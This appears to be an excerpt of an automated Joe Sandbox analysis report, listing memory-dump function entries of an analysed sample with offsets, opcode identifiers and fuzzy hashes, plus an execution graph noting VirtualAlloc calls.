                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0792ea1c6f1f0f9e4f848a4b7eee85080096567d259ac47af2255d053315bb6f
                                                                                                  • Instruction ID: 19c68fb37438a9deecf401b98e3cd7900a3c85737242db2323d734f8c567c4f5
                                                                                                  • Opcode Fuzzy Hash: 0792ea1c6f1f0f9e4f848a4b7eee85080096567d259ac47af2255d053315bb6f
                                                                                                  • Instruction Fuzzy Hash: FF014C30908A8D8FCB85EF58C895AE97FF0FF29301F0501AAE409C71A1D7759A94CB81
                                                                                                  Function 00007FFD9BA10C50 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba10000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1e3a39619f20f818c821dc25f389f942ce79f6797f9dd91883a3a385301e849b
                                                                                                  • Instruction ID: baa6bc499c94d11bf359dbc53f4d311f0767ed2d514fc76a796f6ae086a61c3a
                                                                                                  • Opcode Fuzzy Hash: 1e3a39619f20f818c821dc25f389f942ce79f6797f9dd91883a3a385301e849b
                                                                                                  • Instruction Fuzzy Hash: 3F012434E0E68E8AE721ABA4C8202E977B0EF05700F040676D552872E2CF782204CB45
                                                                                                  Function 00007FFD9BA28DD5 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f5bc7b596093aa7bbed13fb893a29a874be364e55563b7a031a8dc27bb416450
                                                                                                  • Instruction ID: 0d4d404fe980e2b97c5733af37714910d342bd0ea03cc2af31e58f8e0de926e5
                                                                                                  • Opcode Fuzzy Hash: f5bc7b596093aa7bbed13fb893a29a874be364e55563b7a031a8dc27bb416450
                                                                                                  • Instruction Fuzzy Hash: 7F018B3190A78C8FCF54DF28C8555E93BE0FF28750F4502AAF848872A1D738EA54CB81
                                                                                                  Function 00007FFD9BA5D199 Relevance: .0, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8b87b60ec480e4c7d529fa8fea16cc06fc4b6f9d856d767f149819151047c200
                                                                                                  • Instruction ID: 918a8f2503004db966a8203221f5b3eddf2b5be8912b3e6efe947706a50f3bdc
                                                                                                  • Opcode Fuzzy Hash: 8b87b60ec480e4c7d529fa8fea16cc06fc4b6f9d856d767f149819151047c200
                                                                                                  • Instruction Fuzzy Hash: 4A015E3090868D8FDB45EF68C869AD97FF0FF29304F0501ABE849C71A1D7749A54CB81
                                                                                                  Function 00007FFD9BA63189 Relevance: .0, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 073be99251e7dbbd6c836e334987c96df42bb119f2bc1db64012bca0175501d4
                                                                                                  • Instruction ID: 2e56ab2cbf47095e196fd40f1e330192ff7de8abc31cef12cd50f205435314f1
                                                                                                  • Opcode Fuzzy Hash: 073be99251e7dbbd6c836e334987c96df42bb119f2bc1db64012bca0175501d4
                                                                                                  • Instruction Fuzzy Hash: E1011E7090968D8FCF85EF68C8546EA7BB1FF65300F05059AE419C71A1DB759A54CB80
                                                                                                  Function 00007FFD9BA5ABF9 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3da538bc518b439c8e58bdf11904baf94d726b53f7bdeec317d7dde38169cf14
                                                                                                  • Instruction ID: 5ce7211e7b592a17f1982eaa66043460d2697a232e20cd21c5cc54ca42d1f9fa
                                                                                                  • Opcode Fuzzy Hash: 3da538bc518b439c8e58bdf11904baf94d726b53f7bdeec317d7dde38169cf14
                                                                                                  • Instruction Fuzzy Hash: 0B012C3050968C8FCB45DF64C868AE97FB0EF6A300F0501DAD449C71A2C7759A94CB41
                                                                                                  Function 00007FFD9BA628B9 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5ead5db72ea46fd23275a21dff51708c89da3c9ec213f7edbad2ba33ad6c1c28
                                                                                                  • Instruction ID: 6d19faefebd10147228a1eb1ba3ef0f9bba114754467c4cdc049b39a4da02463
                                                                                                  • Opcode Fuzzy Hash: 5ead5db72ea46fd23275a21dff51708c89da3c9ec213f7edbad2ba33ad6c1c28
                                                                                                  • Instruction Fuzzy Hash: CC017C7190978C8FCB85DF64C8A4A997FB0FF69300F0540DAE408C71A2D734D994CB41
                                                                                                  Function 00007FFD9BA64519 Relevance: .0, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3773598518902191c0563c70a36c32b9a9c6f76d198a68fd0002b02771ecff35
                                                                                                  • Instruction ID: e8d347b0952a918b0fa34a501eaae724a1b4d4e82be282c8d480915e0ff33ff3
                                                                                                  • Opcode Fuzzy Hash: 3773598518902191c0563c70a36c32b9a9c6f76d198a68fd0002b02771ecff35
                                                                                                  • Instruction Fuzzy Hash: EA018F71A0968DCFCB85DF68C8646ED7BB0FF25300F0505AEE419C72A2DB349904CB41
                                                                                                  Function 00007FFD9BA64171 Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be239744877f8e7ce3c0992ea465a1ef03acd4da4afcc5d9c6f3466c96edd378
                                                                                                  • Instruction ID: 092bba3eee5e722ca4d5530caf3377c3efd2d4c8e8591e835cbc1481ae6ce207
                                                                                                  • Opcode Fuzzy Hash: be239744877f8e7ce3c0992ea465a1ef03acd4da4afcc5d9c6f3466c96edd378
                                                                                                  • Instruction Fuzzy Hash: BCF0B471E1A74DDFEB51ABB4886A6E97FA0FF25300F0A45B7E44CC20E2DD3856848701
                                                                                                  Function 00007FFD9BA30371 Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 94cf208f74e6a6c515196b3c35064f61e62864c5a286d07de5696d1b8ec7492b
                                                                                                  • Instruction ID: 9a7691662c24bdab7d498e0fc9d48943885115ae0ab618e80f59efaccb7c2cf9
                                                                                                  • Opcode Fuzzy Hash: 94cf208f74e6a6c515196b3c35064f61e62864c5a286d07de5696d1b8ec7492b
                                                                                                  • Instruction Fuzzy Hash: AA011931A1890D8FDF94EF58C8A5ABE77A1FF64344F110069E419D32A1DA74EA55CB80
                                                                                                  Function 00007FFD9BA5D1B0 Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 678928b821ac35366c8fd77c396d2577d3aab7bd6ccbe8c7ce0703928505724f
                                                                                                  • Instruction ID: d5bdeeac97abde1ab8e07dc6a947662f7ed674c27fa10c8432b0734f2ba2a745
                                                                                                  • Opcode Fuzzy Hash: 678928b821ac35366c8fd77c396d2577d3aab7bd6ccbe8c7ce0703928505724f
                                                                                                  • Instruction Fuzzy Hash: 9DF0C930914A4D9FCF44EF58C859AEA7BF0FB68305F01056AA85AD3250DB30A694CB81
                                                                                                  Function 00007FFD9BA30B3B Relevance: .0, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: af3d293699e5bd6f5bf79211d4e78c76232b74542a2c665fc3820f8bb11412dc
                                                                                                  • Instruction ID: b1d8b214886e20cee7c4f6ba94beaafd125e330fb9933f21d21a0fcd763585f7
                                                                                                  • Opcode Fuzzy Hash: af3d293699e5bd6f5bf79211d4e78c76232b74542a2c665fc3820f8bb11412dc
                                                                                                  • Instruction Fuzzy Hash: 5D014B71B08A0E8BEB28DF94C865ABD77B1FB54304F10023EC416D72A5CBB42A058B44
                                                                                                  Function 00007FFD9BA284B5 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b3dc2bb358152b21ab37a885fbf3b957e59177f3933248fbd0e962df7b36262b
                                                                                                  • Instruction ID: 2d5b1a4fa7b60a2c7ce71a9d0a7261827ec74115969507ecfeb52b70b732c741
                                                                                                  • Opcode Fuzzy Hash: b3dc2bb358152b21ab37a885fbf3b957e59177f3933248fbd0e962df7b36262b
                                                                                                  • Instruction Fuzzy Hash: E6F0BE3099A78C8FEB90EF68C8696ED7FA0FF14300F0501AAE808C60A2DB7496948741
                                                                                                  Function 00007FFD9BA27DCD Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dfc30cc530566b3173c43b00a56d0a7518960cc55106cbd8875dff7eebc79d44
                                                                                                  • Instruction ID: 6afe43896fac8672cfcfb9ea7af9d0f816c2b16b1eee9fd0a3a5e8de180cd9bb
                                                                                                  • Opcode Fuzzy Hash: dfc30cc530566b3173c43b00a56d0a7518960cc55106cbd8875dff7eebc79d44
                                                                                                  • Instruction Fuzzy Hash: 13F0903150A68D8FDF95EF18C855A993BA0FF29300F0501A6E458C7161D774EDA0CB81
                                                                                                  Function 00007FFD9BA5AC10 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34badbd0fedea229b69ffce8e5bad66b68a57dbc683c7223a09e0788d612b4b3
                                                                                                  • Instruction ID: 39f3fe47517d7c4e8554cc7e477acad3a0eea2a685e79f5a0fbf074be8d100b3
                                                                                                  • Opcode Fuzzy Hash: 34badbd0fedea229b69ffce8e5bad66b68a57dbc683c7223a09e0788d612b4b3
                                                                                                  • Instruction Fuzzy Hash: 24F0B77091490D9FDF84EF68C459AAA7BF1FB68305F1041AAA41DD32A0DB71A6A4CB80
                                                                                                  Function 00007FFD9BA61B80 Relevance: .0, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 02aa7748c978de13aef4cd104935aa6233602f0721b9fbf1f8394728b365870f
                                                                                                  • Instruction ID: 6ae0cb3a08f71f3f8cc237e0f6c7f3404895f6c9cb3a0ea6e85a186322200bac
                                                                                                  • Opcode Fuzzy Hash: 02aa7748c978de13aef4cd104935aa6233602f0721b9fbf1f8394728b365870f
                                                                                                  • Instruction Fuzzy Hash: A9F0F930904A0D9FCB94EF54C854AAA7BA0FF68304F1040AAE419D3260CB71A694CB80
                                                                                                  Function 00007FFD9BA30B12 Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1cd98a4eebf0c342191fceda7e5bc464835eb4841a3abf53ef297713d026ae9c
                                                                                                  • Instruction ID: 31074958f557d9d2ccc587ee111a1ca9b82156bc36e16ce55c1d95bbf7d95140
                                                                                                  • Opcode Fuzzy Hash: 1cd98a4eebf0c342191fceda7e5bc464835eb4841a3abf53ef297713d026ae9c
                                                                                                  • Instruction Fuzzy Hash: 2A014F30F0860E8BEB28DF94C8616BDB7B1FF40304F11063FC416972A1CBB85A018B44
                                                                                                  Function 00007FFD9BA285ED Relevance: .0, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 483e0d329ec587f5fd3e9039a3259d0f62e5e6e82fd1281a201be268f274d7e5
                                                                                                  • Instruction ID: 5aa7948893e97adb5a2141e7b0d4d5dea1cb211bae73bbe1435e0f76015ad256
                                                                                                  • Opcode Fuzzy Hash: 483e0d329ec587f5fd3e9039a3259d0f62e5e6e82fd1281a201be268f274d7e5
                                                                                                  • Instruction Fuzzy Hash: F2F09A30909A8D8FCB94EF18C865A9A3BE0FF29300F4501A6E448C75A6E774E964CB81
                                                                                                  Function 00007FFD9BA27C25 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b466910d161f0190de7d7997c6168b23a85e7c13652862c8a231d664124a6444
                                                                                                  • Instruction ID: 584a4f28e0c157a7fb627442f5351b955f5c5bb3d8c8211c7a16ad65b3c6311b
                                                                                                  • Opcode Fuzzy Hash: b466910d161f0190de7d7997c6168b23a85e7c13652862c8a231d664124a6444
                                                                                                  • Instruction Fuzzy Hash: 50F0A03184E68C8FDB61EF74889D29D7FF0EF15304F0504A6D449C61A2DA359A84CB01
                                                                                                  Function 00007FFD9BA5E1E2 Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fde4d00471ec110723516e1faec09df8eb01cc0d316d54f3f58629d98db11995
                                                                                                  • Instruction ID: f962bc57710e638c01f689b324d259835862f0556ad3ac0ee71c548751a9578d
                                                                                                  • Opcode Fuzzy Hash: fde4d00471ec110723516e1faec09df8eb01cc0d316d54f3f58629d98db11995
                                                                                                  • Instruction Fuzzy Hash: FAF0D071E0992D4ADBA4DF58C85579D77B1EF54301F1041E6D00CD3196EB745E818F80
                                                                                                  Function 00007FFD9BA62935 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd83f5845cb8b58c9dc0805fc8ae0e884d3ebb009ae104b89fa9caf5db388264
                                                                                                  • Instruction ID: 1ef8a3e0eddc1395ada4272e365d261f34996b68f16da29fb225cf480e8cd6b6
                                                                                                  • Opcode Fuzzy Hash: fd83f5845cb8b58c9dc0805fc8ae0e884d3ebb009ae104b89fa9caf5db388264
                                                                                                  • Instruction Fuzzy Hash: 8EE04635A0868D8FCF15CF58D8608E97B70EF96328B1500A6D00E8B1A6CA32EA52DB40
                                                                                                  Function 00007FFD9BA63A56 Relevance: .0, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 767114252f4f97cbd1979d405d924af769c02a70152d61780a3bda13e585c7fb
                                                                                                  • Instruction ID: fb38bbbb39bad5965ac69d0c562bb7ac675a39eb76e64c5b45d027b4557d2995
                                                                                                  • Opcode Fuzzy Hash: 767114252f4f97cbd1979d405d924af769c02a70152d61780a3bda13e585c7fb
                                                                                                  • Instruction Fuzzy Hash: C6E0ED70A0655D8EDBA4DF58C9667BC72B1EF08300F5158B5A00FE21A1CE746A858B00

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:10.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:7
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 6381 7ffd9b9f72ba 6382 7ffd9b9f72c7 6381->6382 6385 7ffd9b9f0750 6382->6385 6384 7ffd9b9f17da 6385->6384 6386 7ffd9ba03940 6385->6386 6387 7ffd9ba03c9d VirtualAlloc 6386->6387 6388 7ffd9ba03cf5 6387->6388 6388->6384

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B9F070D Relevance: 1.7, APIs: 1, Instructions: 468memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 16 7ffd9b9f070d-7ffd9b9f074f
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000025.00000002.2822400102.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9b9f0000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 5b5e515e112575df014c765117a4505b313ce6532c66a9da1a68a0d392d9716a
                                                                                                  • Instruction ID: d02a058286754925a43522269625189deaf858e84080417aa36e6b3f793555e6
                                                                                                  • Opcode Fuzzy Hash: 5b5e515e112575df014c765117a4505b313ce6532c66a9da1a68a0d392d9716a
                                                                                                  • Instruction Fuzzy Hash: 65F1C030A1964D8FDB95EF68C855BEDBBF0FF19300F0141AAE449D3292DB74A985CB81
                                                                                                  Function 00007FFD9B9F0750 Relevance: 1.7, APIs: 1, Instructions: 440memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000025.00000002.2822400102.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_37_2_7ffd9b9f0000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 73ad6e5835af355644bb79746ea2ad5af91ef3f187fd09d33ba9ceb507f45288
                                                                                                  • Instruction ID: 63ec4e5def711091e6d92780be503afa9af499c18f8f85e71e7a1885352dd75d
                                                                                                  • Opcode Fuzzy Hash: 73ad6e5835af355644bb79746ea2ad5af91ef3f187fd09d33ba9ceb507f45288
                                                                                                  • Instruction Fuzzy Hash: 91E1B03091964D8FDB94EF68C855BED7BF0FF59300F0141AAE449D3292DB74A985CB41